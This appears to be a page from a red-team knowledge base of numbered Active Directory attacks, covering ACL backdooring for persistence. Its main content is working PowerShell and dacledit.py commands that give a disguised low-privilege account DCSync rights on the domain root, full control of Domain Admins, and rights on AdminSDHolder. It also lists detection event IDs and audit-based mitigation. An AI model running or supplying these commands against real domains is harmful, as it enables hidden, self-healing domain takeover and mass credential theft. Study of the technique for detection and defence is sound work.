attack-65-acl-backdooring-persistence-via-dcsync-ace.md (3445B)
1 --- 2 title: "Attack #65 โ ACL Backdooring (Persistence via DCSync ACE)" 3 description: "An attacker with DA can add hidden ACEs to domain objects to maintain persistent access. The most common pattern: grant a seemingly innocuous user DCSyncโฆ" 4 category: active-directory 5 subcategory: "Persistence" 6 tags: ["active-directory", "adcs", "credential-access", "persistence"] 7 tools: ["PowerShell"] 8 difficulty: advanced 9 updated: "2026-08-10" 10 source: "vault:ActiveDirectory/AD-Attack/Category-Eight/๐ค Attack #65 โ ACL Backdooring (Persistence via DCSync ACE).md" 11 --- 12 # ๐ค Attack #65 โ ACL Backdooring (Persistence via DCSync ACE) 13 14 *** 15 16 ## ๐ How It Works 17 18 An attacker with DA can **add hidden ACEs** to domain objects to maintain persistent access. The most common pattern: grant a seemingly innocuous user DCSync rights on the domain root, or add GenericAll on the DA group, or backdoor AdminSDHolder (#26). Even after the DA account is revoked, the backdoor ACE allows re-escalation. 19 20 *** 21 22 ## โ๏ธ Prerequisites 23 24 | Requirement | Detail | 25 |---|---| 26 | **Domain Admin** | To modify ACLs on domain objects | 27 28 *** 29 30 ## ๐ป Full Commands 31 32 ```powershell 33 # โโ Grant DCSync to a low-priv user (persistence) โโโโโโโโโโโโโโโโโโโโโโโโโโโโ 34 Add-DomainObjectAcl -TargetIdentity "DC=corp,DC=local" \ 35 -PrincipalIdentity svc_monitoring -Rights DCSync -Verbose 36 # svc_monitoring now has permanent DCSync โ looks like a service account 37 38 # โโ Grant GenericAll on DA group โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ 39 Add-DomainObjectAcl -TargetIdentity "Domain Admins" \ 40 -PrincipalIdentity svc_monitoring -Rights All 41 42 # โโ BackdoorAdminSDHolder (Attack #26 โ self-healing) โโโโโโโโโโโโโโโโโโโโโโโโ 43 Add-DomainObjectAcl -TargetIdentity "CN=AdminSDHolder,CN=System,DC=corp,DC=local" \ 44 -PrincipalIdentity svc_monitoring -Rights All 45 46 # โโ Verify โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ 47 Get-ObjectAcl "DC=corp,DC=local" -ResolveGUIDs | Where-Object { 48 $_.IdentityReference -match "svc_monitoring" 49 } 50 ``` 51 52 ```bash 53 # โโ Linux โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ 54 dacledit.py -action write -rights DCSync \ 55 -principal svc_monitoring -target-dn "DC=corp,DC=local" \ 56 corp.local/Administrator:'Password1' -dc-ip 10.10.10.10 57 ``` 58 59 *** 60 61 ## ๐ก๏ธ Detection โ Event IDs 62 63 | Event ID | Source | What to Look For | 64 |---|---|---| 65 | **4662** | Security Log (DC) | DACL write on domain root | 66 | **5136** | Security Log (DC) | nTSecurityDescriptor modified | 67 68 *** 69 70 ## ๐ Attack Chain Context 71 72 ``` 73 [ACL Backdooring] โโโ Persistent Privilege Re-Escalation via Hidden ACEs 74 โ 75 โโโโ ๐ DCSync ACE + AdminSDHolder = self-healing persistent access 76 โโโโ ๐ Survives DA account revocation โ the backdoor ACE remains 77 โโโโ ๐ Defeated by: regular ACL audits, baseline domain root DACL 78 ``` 79 80 *** 81 82 > โ **Attack #65 โ ACL Backdooring complete.**